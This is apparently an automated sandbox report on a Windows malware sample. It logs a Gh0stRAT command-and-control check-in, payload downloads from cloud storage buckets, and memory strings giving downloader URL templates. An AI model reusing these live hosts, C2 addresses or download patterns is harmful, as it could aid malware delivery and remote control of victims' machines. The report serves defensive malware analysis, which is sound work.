              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]7_2_000000014000E178
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]7_2_000000014000DDD9

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.9:49987 -> 8.217.47.169:8917
              Source: global trafficTCP traffic: 192.168.2.9:49987 -> 8.217.47.169:8917
              Source: Joe Sandbox ViewIP Address: 118.178.60.9 118.178.60.9
              Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.47.169
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.47.169
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.47.169
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: 662hfg.oss-cn-beijing.aliyuncs.com
              Source: global trafficDNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
              Source: global trafficDNS traffic detected: DNS query: cvqthu.net
              Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/%d.dll
              Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/%d.dllC:
              Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/ip.txt
              Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/ip.txtC:
              Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/upx.rar
              Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/upx.rarC:
              Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
              Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
              Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.drString found in binary or memory: http://ocsp.thawte.com0
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com0_
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sw.symcb.com/sw.crl0
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sw.symcd.com0
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sw1.symcb.com/sw.crt0
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
              Source: 2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/
              Source: 2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/7-2476756634-1003q5W;
              Source: 2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/A5
              Source: 2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/Y5O;
              Source: 2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif
